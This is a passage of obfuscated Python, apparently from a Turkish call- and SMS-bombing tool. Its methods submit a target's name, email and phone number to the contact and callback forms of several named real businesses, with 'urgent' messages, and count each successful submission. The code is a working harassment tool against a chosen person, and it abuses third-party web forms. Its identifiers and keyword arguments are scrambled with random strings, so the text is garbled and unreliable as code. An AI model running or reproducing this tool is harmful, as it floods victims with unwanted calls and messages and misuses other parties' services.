pppppppppppppppppppppppppp=\"semt\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nKartal\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"eposta\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.mail}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"tel\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.phone}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"lll\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.tarih}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"sube\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nBak\xc4\xb1rk\xc3\xb6y \xc5\x9eubesi\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"konu\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nAcil\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"mesaj\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nAcil arayin!\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------321748292840246706102673633934--\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n".encode("utf-8")
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, AAaaaAAaAAaaAaAAaaA=AAaaaAAaAAaaAaAAaaA, p9=p9)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.json()["message"] == 'Mesajın için teşekkürler. Gönderildi.':
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> cinselterapi.info")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> cinselterapi.info")


    #otelz.com
    def Otelz(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.otelz.com:443/api/v1/dynamic-forms"
            PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP={"callRequest": "0", "callRequestHour": "1", "content": "Acil!", "email": self.mail, "firstName": self.ad, "formType": "LetUsCallYou", "lastName": self.soyad, "EEEEE": self.phone}
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.text == "true":
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> otelz.com")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> otelz.com")
            
            
    #expressdekor.com
    def Express(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.expressdekor.com:443/wp-PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP/contact-form-7/v1/contact-forms/3484/feedback?N1676409556129635848=user"
            AAaaaAAaAAaaAaAAaaA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "application/PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP, */*;AaaaaAAAAaaAaAAAAaAa=0.1", "Accept-Language": "tr-TR,tr;AaaaaAAAAaaAaAAAAaAa=0.8,en-US;AaaaaAAAAaaAaAAAAaAa=0.5,en;AaaaaAAAAaaAaAAAAaAa=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.expressdekor.com/sizi-arayalim/", "X-Wp-Nonce": "1894915dc7", "Content-Type": "multipart/form-p9; c24=---------------------------366167737039134484653049978932", "Origin": "https://www.expressdekor.com", "Dnt": "1", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers"}
            p9 = f"-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n3484\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_version\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n5.4\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_locale\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\ntr_TR\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_unit_tag\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nwpcf7-f3484-p3483-o1\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_container_post\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n3483\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_posted_data_hash\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-pppppppppppppppppppppppppp\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.ad} {self.soyad}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-EEEEE\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.phone}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-message\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nAcil!\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------366167737039134484653049978932--\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n".encode("utf-8")
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, AAaaaAAaAAaaAaAAaaA=AAaaaAAaAAaaAaAAaaA, p9=p9)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.json()["message"] == 'Mesajınız için teşekkürler. Gönderildi.':
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> expressdekor.com")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> expressdekor.com")
            
    
    #thepicktolight.com
    def Thepick(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://thepicktolight.com:443/wp-PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP/contact-form-7/v1/contact-forms/561/feedback"
            AAaaaAAaAAaaAaAAaaA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "application/PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP, */*;AaaaaAAAAaaAaAAAAaAa=0.1", "Accept-Language": "tr-TR,tr;AaaaaAAAAaaAaAAAAaAa=0.8,en-US;AaaaaAAAAaaAaAAAAaAa=0.5,en;AaaaaAAAAaaAaAAAAaAa=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "https://thepicktolight.com/siziarayalim/", "Content-Type": "multipart/form-p9; c24=---------------------------312483609613997599601843430130", "Origin": "https://thepicktolight.com", "Dnt": "1", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers"}
            p9 = f"-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n561\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_version\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n5.6.3\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_locale\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nen_US\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_unit_tag\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nwpcf7-f561-p534-o1\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_container_post\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n534\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"_wpcf7_posted_data_hash\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-pppppppppppppppppppppppppp\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.ad}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-email\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n{self.mail}\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-subject\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nAcil\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nContent-Disposition: form-p9; pppppppppppppppppppppppppp=\"your-message\"\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\nCok Acil!\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n-----------------------------312483609613997599601843430130--\DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10\n"
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, AAaaaAAaAAaaAaAAaaA=AAaaaAAaAAaaAaAAaaA, p9=p9)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.json()["message"] == 'Thank you for your message. It has been sent.':
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> thepicktolight.com")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> thepicktolight.com")
            
        
    #vajinismustedavimerkezi.net
    def Vajini(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.vajinismustedavimerkezi.net:443/sizi-arayalim"
            AAaaaAAaAAaaAaAAaaA = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB/html,application/xhtml+xml,application/xml;AaaaaAAAAaaAaAAAAaAa=0.9,image/avif,image/webp,*/*;AaaaaAAAAaaAaAAAAaAa=0.8", "Accept-Language": "tr-TR,tr;AaaaaAAAAaaAaAAAAaAa=0.8,en-US;AaaaaAAAAaaAaAAAAaAa=0.5,en;AaaaaAAAAaaAaAAAAaAa=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://www.vajinismustedavimerkezi.net", "Dnt": "1", "Referer": "https://www.vajinismustedavimerkezi.net/sizi-arayalim", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}
            p9 = {"pppppppppppppppppppppppppp": self.ad, "email": self.mail, "emailid": "1,Telefon Numaran\xc4\xb1z,", "subject": "Acil", "message": "Cok Acil!!", "extra0": self.phone, "extravalues": f"#{self.phone}", "option": "com_alfcontact", "task": "sendemail", "emailto_id": "1", "34678c7059ce93f3539d11c789db1afe": "1"}
            DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10 = requests.post(eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8, AAaaaAAaAAaaAaAAaaA=AAaaaAAaAAaaAaAAaaA, p9=p9, m12=False)
            if DmoeIxOgXFwtnfFysiiEKYKtvwPnFffaVRKSnKuEdapORFEPBMIDUpMIjZPLMpSaicBMHBLQlVBuyRD10.status_code == 303:
                print(f"{Fore.LIGHTGREEN_EX}[+] {Style.RESET_ALL}Başarılı! --> vajinismustedavimerkezi.net")
                self.adet += 1
            else:
                raise 
        except:
            print(f"{Fore.LIGHTRED_EX}[-] {Style.RESET_ALL}Başarısız! --> vajinismustedavimerkezi.net")
            
    
    #gmcyatirim.com.tr
    def GmcYatirim(self):
        try:
            eJhoMGofwkkXkchAzfwlRxopfQMdqDMnpdRaQDrmasHZiutIWBABURhYQbTEKkwGWvDrvsNQDDQkmmJ8 = "https://www.gcmyatirim.com.tr:443/SERVER/en/gcmforex/Client/Form?aaaaaAAaaAAAAAaAaaAaaaAaaAaAAaAAAAAAAaAAAAaAAaAAAAAAaAaAAaAAAaAaaAAaAAaaAAaaAAAaaaAaaaAAaAaaAaAaaaaaAaa=QuickRegistrationMultiTraderWidget&J104=tr&v105=False"
